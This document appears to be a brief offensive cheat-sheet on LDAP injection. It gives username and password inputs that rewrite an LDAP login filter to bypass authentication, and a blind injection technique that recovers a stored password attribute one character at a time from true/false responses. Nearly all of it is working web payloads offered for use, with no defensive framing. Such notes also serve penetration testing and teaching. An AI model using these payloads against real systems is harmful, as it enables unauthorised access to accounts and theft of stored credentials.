# Classical request: (&(uid=)(userPassword=))
# So the result is TRUE only if both the uid AND userPassword conditions are true
# You can put ')' in the request to trigger an error and see how the request is built
username : *)(|(uid=*
password : )
→ (&(uid=*)(|(uid=*)(userPassword=)))
OR
username=*
password=*)(&
→ (&(uid=*)(userPassword=*)(&))
Blind LDAP Injection
# You have to find out or guess how the request is built
# Test using only a single character → OK → the request is (mail=*[text]*)
# You can try (mail=*)(sn=*) → )(sn= → OK
# Then the password attribute: (mail=*)(password=*) → OK
@*)(password=x → FALSE
@*)(password=d → TRUE
# You can then enumerate each character